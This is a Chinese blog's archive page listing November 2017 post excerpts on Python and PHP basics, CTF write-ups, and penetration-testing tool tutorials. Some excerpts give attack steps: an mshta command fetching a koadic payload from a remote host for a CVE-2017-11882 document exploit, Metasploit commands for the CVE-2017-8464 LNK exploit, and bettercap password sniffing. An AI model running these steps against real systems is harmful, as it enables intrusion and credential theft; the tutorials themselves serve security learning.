11 2017 档案

摘要:在python脚本运行过程中如果出现什么问题,会报错,还会停止脚本的运行。我们可以用异常处理来解决这种问题 运行结果 和没有进行异常处理的运行结果进行比较 脚本运行时要是出错,爆出出错的原因 自定义异常处理 运行结果 当有return返回值时打印返回值的内容 把__str__()函数注释掉,执行 当 阅读全文
posted @ 2017-11-28 20:47 Sch01aR# 编辑
摘要:1.全局变量 可见,在函数中无法直接调用全局变量 test()函数中的变量$a和$b都没有被赋值,进行空值运算,得到结果为0 在函数中使用全局变量可以使用global和$GLOBALS数组 使用global 使用$GLOBALS数组 2.局部变量 函数外不能访问函数内定义的变量,所以函数外进行空值运 阅读全文
posted @ 2017-11-23 22:55 Sch01aR# 编辑
摘要:项目地址:https://github.com/iBearcat/CVE-2017-11882 首先开启koadic,然后配置一下 复制这句代码 mshta http://192.168.220.132:9999/dHem0 然后生成doc文件 ┌─[root@sch01ar]─[/sch01ar/ 阅读全文
posted @ 2017-11-21 22:34 Sch01aR# 编辑
摘要:项目地址:https://github.com/zerosum0x0/koadic 下载后打开并安装所需的包 安装完成后启动程序 输入use和空格然后连按两下Tab键查看模块 stager开头的模块是用来反弹主机的,implant开头的模块是用来对反弹的主机进行操作 选择stager/js/disk 阅读全文
posted @ 2017-11-18 18:04 Sch01aR# 编辑
摘要:Spamcarver Spamcarver 用kali下载图片 用binwalk查看是否有隐藏的文件 隐藏着一个zip文件 用foremost分离出文件 在/root/output/的目录下,得到flag 缝缝补补又三年: 下载zip文件,打开 key.txt文件打不开,flag应该就在里面 用c3 阅读全文
posted @ 2017-11-17 23:00 Sch01aR# 编辑
摘要:使用binwalk检测是否隐藏了文件 还藏了一个zip文件,接下来用foremost来分离文件 分离出来的文件会在/root/output/的目录下 阅读全文
posted @ 2017-11-17 16:40 Sch01aR# 编辑
摘要:安装bettercap 安装完成后查看一下帮助 开启嗅探 用同一内网的windows2008机访问一个网站,并模拟登陆 嗅探到密码 参数详情: -I:后面加网卡 --use-mac:使用MAC地址替换本机的MAC地址进行攻击 --random-mac:用随机的MAC地址替换本机的MAC地址进行攻击 阅读全文
posted @ 2017-11-12 17:02 Sch01aR# 编辑
摘要:easy! KeyBoard base64全家桶 n次base64 骚年来一发吗 mixed_base64 异性相吸 MD5 easy! KeyBoard base64全家桶 n次base64 骚年来一发吗 mixed_base64 异性相吸 MD5 easy!: 密文:bmN0Znt0aGlzX2 阅读全文
posted @ 2017-11-09 23:09 Sch01aR# 编辑
摘要:项目地址:https://github.com/Screetsec/TheFatRat 安装TheFatRat 安装完成后直接在终端输入fatrat启动 回车 回车 回车 这是菜单界面 这里测试两个功能,首先测试反弹电脑的 选择1,回车 这里有多个文件类型可以选择,我就测试php的,选择5,回车 填 阅读全文
posted @ 2017-11-08 21:14 Sch01aR# 编辑
摘要:项目地址:https://github.com/AlisamTechnology/ATSCAN 安装的时候一直回车选择默认选项,安装完成后 查看参数 对目标站进行sql注入检测 阅读全文
posted @ 2017-11-06 23:40 Sch01aR# 编辑
摘要:开启msf root@sch01ar:~# msfconsole 设置模块 msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce 设置payload msf exploit(cve_2017_8464_lnk_rce) > set pa 阅读全文
posted @ 2017-11-05 16:09 Sch01aR# 编辑
摘要:单继承 运行结果 Jack is talking #调用父类的talk方法Jack is studying #调用本身的study方法Jack is eating #重构父类中的eat方法后又调用了父类的eat方法Jack doesn't like eating #调用了本身重构父类eat方法后的e 阅读全文
posted @ 2017-11-04 20:16 Sch01aR# 编辑
摘要:平台地址:http://ctf.nuptsast.com/ 签到题: 右键查看源代码,得到flag md5 collision: 传入的a的md5值要为0e开头的,但不能是QNKCDZO,百度一个0e开头的md5 得到flag 签到2: 右键查看源代码 输入框允许的最大长度为10,口令的长度为11 阅读全文
posted @ 2017-11-03 21:25 Sch01aR# 编辑
摘要:fwrite() //对文件进行写入 fwrite(file,string,length)file:必选项,需要写入的文件string:必选项,规定要写入文件的字符串length:可选项,规定要写入的最大字节数 如果规定了最大的字节数,fwrite()函数将在写入了最大的字节数时停止,否则将一直写入 阅读全文
posted @ 2017-11-02 17:49 Sch01aR# 编辑
摘要:def __init__(self) 为构造函数,给实例化的类传参数,self为实例化的对象赋予的变量,相当于例子中的p1 运行结果 阅读全文
posted @ 2017-11-01 23:09 Sch01aR# 编辑

点击右上角即可分享
微信分享提示